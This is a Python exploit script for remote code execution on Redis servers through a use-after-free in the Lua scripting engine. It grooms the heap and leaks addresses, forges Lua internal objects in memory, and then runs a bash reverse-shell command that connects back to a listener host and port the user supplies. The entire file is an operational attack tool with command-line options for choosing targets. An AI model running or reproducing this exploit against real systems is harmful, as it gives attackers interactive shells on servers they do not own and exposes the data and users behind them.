README.md
Rendering markdown...
import uuid
import struct
import argparse
from redis import Redis
K_TSTRING = 'tstring'
K_LUASTATE = 'luastate'
class ExploitState:
_lua_src = [
'stage1-forge-objects',
'stage1-leak-tstring',
'stage1-uaf',
'stage1-clear-heap',
]
def __init__(self, redis_: Redis):
self.id = uuid.uuid4().hex
self.redis = redis_
self.src = {}
self.tstring_addr = 0
self.k_tstring = 'tstring_%s' % self.id
for src_file in self._lua_src:
with open(f'./{src_file}.lua', 'r') as f:
self.src[src_file] = f.read()
def stage1_leak_tstring(state: ExploitState):
state.redis.eval(state.src['stage1-leak-tstring'], 1, state.k_tstring)
nres = state.redis.llen(state.k_tstring)
res = [state.redis.lpop(state.k_tstring) for _ in range(nres)]
addrs = []
for desc in res:
t = desc.decode().split(' ')[1]
addrs.append(int(t, 16))
tstring_addrs = []
for c1, c2 in zip(addrs[:-1], addrs[1:]):
diff = c2 - c1
if diff == 0x5b0:
tstring_addrs.append(c1 + 0x508)
print(f'[/] coro1=0x{c1:x}, coro2=0x{c2:x}, diff=0x{diff:x}')
assert tstring_addrs, \
'Heap grooming failed - distance between threads is wrong'
state.tstring_addr = tstring_addrs[min(1, len(tstring_addrs) - 1)]
print("[+] TString address: 0x%x" % state.tstring_addr)
def stage1_forge_objects(state: ExploitState):
array_addr = state.tstring_addr + 0x48
tstring2_addr = array_addr + 0x10
node_addr = tstring2_addr + 0x10
# Table: 0x48
tstring = b''
tstring += struct.pack("<Q", 0xd3adb33f) # next
tstring += struct.pack("<B", 0x0) # tt
tstring += struct.pack("<B", 0x0) # marked
tstring += struct.pack("<B", 0x0) # flags
tstring += struct.pack("<B", 0x0) # [alignment]
tstring += struct.pack("<L", 0x0) # readonly
tstring += struct.pack(">Q", 0x0) # lsizenode + [alignment]
tstring += struct.pack("<Q", 0x0) # metatable
tstring += struct.pack("<Q", array_addr) # array
tstring += struct.pack("<Q", node_addr) # node
tstring += struct.pack("<Q", 0x0) # lastfree
tstring += struct.pack("<Q", 0x0) # gclist
tstring += struct.pack("<L", 0x1) # sizearray
tstring += struct.pack("<L", 0x0) # [alignment]
# Array: 0x10
tstring += struct.pack("<Q", tstring2_addr) # value.gc
tstring += struct.pack("<L", 4) # tt
tstring += struct.pack("<L", 0) # [alignment]
# TString: 0x18
tstring += struct.pack("<Q", 0x0) # next
tstring += struct.pack("<B", 0x0) # tt
tstring += struct.pack("<B", 0x0) # marked
tstring += struct.pack("<B", 0x0) # reserved
tstring += struct.pack("<B", 0x0) # [alignment]
tstring += struct.pack("<L", 0x0) # hash
tstring += struct.pack("<Q", 0x1000) # len
# Node: 0x28
tstring += struct.pack("<Q", 0x0) # i_val.value
tstring += struct.pack("<L", 0x0) # i_val.tt
tstring += struct.pack("<L", 0x0) # [alignment]
tstring += struct.pack("<Q", 0x0) # i_key.nk.value
tstring += struct.pack("<Q", 0x0) # i_key.nk.tt
tstring += struct.pack("<Q", 0x0) # i_key.nk.next
# Padding
tstring += b'\x00\x00\x00\x00\x00'
state.redis.eval(state.src['stage1-forge-objects'], 0, tstring)
def stage1_uaf(state: ExploitState, command: str):
# 0x28
udata = b''
udata += struct.pack("<Q", 0x0) # next
udata += struct.pack("<B", 0x0) # tt
udata += struct.pack("<B", 0x0) # marked
udata += struct.pack("<H", 0x0) # [alignment]
udata += struct.pack("<L", 0x0) # [alignment]
udata += struct.pack("<Q", state.tstring_addr) # metatable
udata += struct.pack("<Q", 0x0) # env
udata += struct.pack("<Q", 0x0) # len
# Each Udata instance will have a libc header between them
# NB. will have one bad chunk at the start e.g. AAAAAAAAAAAAAAA00000001
tstring = struct.pack("<Q", 0x0).join(udata for _ in range(4))
tstring = tstring[:-2]
large_chunk = b'X' * 0x10000
state.redis.eval(state.src['stage1-uaf'], 0, tstring, large_chunk, command)
def stage1(state: ExploitState, command: str):
stage1_leak_tstring(state)
stage1_forge_objects(state)
stage1_uaf(state, command)
def cleanup(state: ExploitState):
state.redis.delete(state.k_tstring)
state.redis.script_flush()
def clear_heap(state: ExploitState):
state.redis.script_flush()
state.redis.eval(state.src['stage1-clear-heap'], 0, b'X' * 0x10000)
state.redis.script_flush()
state.redis.eval(state.src['stage1-clear-heap'], 0, b'X' * 0x10000)
def main(rhost, rport, lhost, lport, password):
r = Redis(host=rhost, port=rport, password=password)
command = f'bash -c "( bash -i >&/dev/tcp/{lhost}/{lport} 0>&1 )&" > /dev/null'
state = ExploitState(r)
clear_heap(state)
stage1(state, command)
cleanup(state)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--lhost', required=True, type=str,
help="The reverse shell listen host")
parser.add_argument('--lport', required=True, type=int,
help="The reverse shell listen port")
parser.add_argument('--rhost', required=True, type=str,
help="The Redis host")
parser.add_argument('--rport', type=int, default=6379,
help="The redis host port, defaults to 6379")
parser.add_argument('--password', type=str, default=None,
help="The redis password")
args = parser.parse_args()
main(args.rhost, args.rport, args.lhost, args.lport, args.password)